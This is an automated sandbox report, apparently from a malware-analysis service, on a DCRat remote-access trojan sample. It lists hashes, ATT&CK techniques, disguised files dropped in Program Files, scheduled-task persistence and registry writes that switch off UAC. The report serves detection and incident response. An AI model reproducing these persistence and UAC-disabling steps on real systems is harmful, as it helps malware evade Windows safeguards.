dcrat | 36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bf

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
07-12-2024 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Size

1.8MB
MD5

30742ba610a6e66abe158742a400b5a0
SHA1

2ae4b096bc3cfdc876204597a74a69f7203e1b1d
SHA256

36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bf
SHA512

c4c6da35dbadbf12fba72fe695c056d5dcc5b7793b98ded3c66877f9db4e5360f0371ec08c76ce4f85d6585ee40e3110b41889883f0bc436add314f01cb099e4
SSDEEP

49152:WhjAJVllHZrhbBruPk+xjSMX4ODTDF8OcFSkMh:WgVTVXYNX9mOWSkM

Score

10^/10

dcrat evasion execution infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 33 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1744	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2796	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2588	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2200	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1576	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2800	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2888	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	584	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2756	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2900	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2932	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1244	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1476	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1916	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1296	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1740	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	264	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1712	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2316	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	112	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	684	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	2752	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1972	2752	schtasks.exe	30

UAC bypass 3 TTPs 21 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/1620-1-0x0000000000180000-0x000000000034E000-memory.dmp	dcrat
behavioral1/files/0x000500000001937b-24.dat	dcrat
behavioral1/files/0x000c000000016c03-79.dat	dcrat
behavioral1/memory/2024-184-0x0000000001060000-0x000000000122E000-memory.dmp	dcrat
behavioral1/memory/1556-196-0x00000000000E0000-0x00000000002AE000-memory.dmp	dcrat
behavioral1/memory/1936-209-0x0000000000FC0000-0x000000000118E000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3016	powershell.exe
2044	powershell.exe
1756	powershell.exe
2388	powershell.exe
1796	powershell.exe
2292	powershell.exe
276	powershell.exe
2288	powershell.exe
3008	powershell.exe
992	powershell.exe
1472	powershell.exe
3012	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
2024	smss.exe
1556	smss.exe
1936	smss.exe
2288	smss.exe
1560	smss.exe
1848	smss.exe

Checks whether UAC is enabled 1 TTPs 14 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe

Drops file in Program Files directory 24 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Games\Solitaire\dllhost.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\Windows Photo Viewer\it-IT\smss.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\Windows Photo Viewer\it-IT\69ddcba757bf72	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\27d1bcfc3c54e0	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files (x86)\Google\CrashReports\csrss.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\RCX36B1.tmp	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\it-IT\RCX3922.tmp	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RCX2BB4.tmp	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files (x86)\Google\CrashReports\RCX2E25.tmp	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\Windows Sidebar\Shared Gadgets\lsass.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\6203df4a6bafc7	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files (x86)\Google\CrashReports\886983d96e3d3e	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\Windows Sidebar\Shared Gadgets\RCX322D.tmp	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\System.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files (x86)\Google\CrashReports\csrss.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\0a1fd5f707cd16	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\Microsoft Games\Solitaire\5940a34987c991	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files\VideoLAN\VLC\hrtfs\System.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\dllhost.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\it-IT\smss.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\hrtfs\RCX3F2D.tmp	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sppsvc.exe	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 33 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2800	schtasks.exe
1476	schtasks.exe
2316	schtasks.exe
2932	schtasks.exe
1916	schtasks.exe
1712	schtasks.exe
1764	schtasks.exe
1972	schtasks.exe
1500	schtasks.exe
2756	schtasks.exe
1468	schtasks.exe
264	schtasks.exe
684	schtasks.exe
2588	schtasks.exe
1304	schtasks.exe
1108	schtasks.exe
1744	schtasks.exe
1740	schtasks.exe
1576	schtasks.exe
2192	schtasks.exe
584	schtasks.exe
2900	schtasks.exe
112	schtasks.exe
2796	schtasks.exe
2576	schtasks.exe
2716	schtasks.exe
2156	schtasks.exe
2384	schtasks.exe
2200	schtasks.exe
1244	schtasks.exe
2592	schtasks.exe
2888	schtasks.exe
1296	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
2044	powershell.exe
3016	powershell.exe
276	powershell.exe
2388	powershell.exe
992	powershell.exe
1796	powershell.exe
1472	powershell.exe
2288	powershell.exe
3008	powershell.exe
3012	powershell.exe
2292	powershell.exe
1756	powershell.exe
2024	smss.exe
1556	smss.exe
1936	smss.exe
2288	smss.exe
1560	smss.exe
1848	smss.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	276	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	2024	smss.exe
Token: SeDebugPrivilege	1556	smss.exe
Token: SeDebugPrivilege	1936	smss.exe
Token: SeDebugPrivilege	2288	smss.exe
Token: SeDebugPrivilege	1560	smss.exe
Token: SeDebugPrivilege	1848	smss.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 3012	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	64
PID 1620 wrote to memory of 3012	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	64
PID 1620 wrote to memory of 3012	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	64
PID 1620 wrote to memory of 2288	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	65
PID 1620 wrote to memory of 2288	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	65
PID 1620 wrote to memory of 2288	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	65
PID 1620 wrote to memory of 3016	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	66
PID 1620 wrote to memory of 3016	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	66
PID 1620 wrote to memory of 3016	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	66
PID 1620 wrote to memory of 2044	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	67
PID 1620 wrote to memory of 2044	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	67
PID 1620 wrote to memory of 2044	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	67
PID 1620 wrote to memory of 3008	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	68
PID 1620 wrote to memory of 3008	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	68
PID 1620 wrote to memory of 3008	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	68
PID 1620 wrote to memory of 1756	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	69
PID 1620 wrote to memory of 1756	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	69
PID 1620 wrote to memory of 1756	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	69
PID 1620 wrote to memory of 2388	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	70
PID 1620 wrote to memory of 2388	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	70
PID 1620 wrote to memory of 2388	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	70
PID 1620 wrote to memory of 1796	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	71
PID 1620 wrote to memory of 1796	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	71
PID 1620 wrote to memory of 1796	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	71
PID 1620 wrote to memory of 992	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	72
PID 1620 wrote to memory of 992	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	72
PID 1620 wrote to memory of 992	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	72
PID 1620 wrote to memory of 2292	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	73
PID 1620 wrote to memory of 2292	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	73
PID 1620 wrote to memory of 2292	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	73
PID 1620 wrote to memory of 276	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	74
PID 1620 wrote to memory of 276	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	74
PID 1620 wrote to memory of 276	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	74
PID 1620 wrote to memory of 1472	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	75
PID 1620 wrote to memory of 1472	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	75
PID 1620 wrote to memory of 1472	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	75
PID 1620 wrote to memory of 2680	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	88
PID 1620 wrote to memory of 2680	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	88
PID 1620 wrote to memory of 2680	1620	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe	88
PID 2680 wrote to memory of 3060	2680	cmd.exe	90
PID 2680 wrote to memory of 3060	2680	cmd.exe	90
PID 2680 wrote to memory of 3060	2680	cmd.exe	90
PID 2680 wrote to memory of 2024	2680	cmd.exe	91
PID 2680 wrote to memory of 2024	2680	cmd.exe	91
PID 2680 wrote to memory of 2024	2680	cmd.exe	91
PID 2024 wrote to memory of 1384	2024	smss.exe	92
PID 2024 wrote to memory of 1384	2024	smss.exe	92
PID 2024 wrote to memory of 1384	2024	smss.exe	92
PID 2024 wrote to memory of 2280	2024	smss.exe	93
PID 2024 wrote to memory of 2280	2024	smss.exe	93
PID 2024 wrote to memory of 2280	2024	smss.exe	93
PID 1384 wrote to memory of 1556	1384	WScript.exe	94
PID 1384 wrote to memory of 1556	1384	WScript.exe	94
PID 1384 wrote to memory of 1556	1384	WScript.exe	94
PID 1556 wrote to memory of 2636	1556	smss.exe	95
PID 1556 wrote to memory of 2636	1556	smss.exe	95
PID 1556 wrote to memory of 2636	1556	smss.exe	95
PID 1556 wrote to memory of 1244	1556	smss.exe	96
PID 1556 wrote to memory of 1244	1556	smss.exe	96
PID 1556 wrote to memory of 1244	1556	smss.exe	96
PID 2636 wrote to memory of 1936	2636	WScript.exe	97
PID 2636 wrote to memory of 1936	2636	WScript.exe	97
PID 2636 wrote to memory of 1936	2636	WScript.exe	97
PID 1936 wrote to memory of 1696	1936	smss.exe	98

System policy modification 1 TTPs 21 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	smss.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	smss.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe
"C:\Users\Admin\AppData\Local\Temp\36157893d0fbe825ea17747b97b7eb5893059a6f1aa06080deb87ef47410b6bfN.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
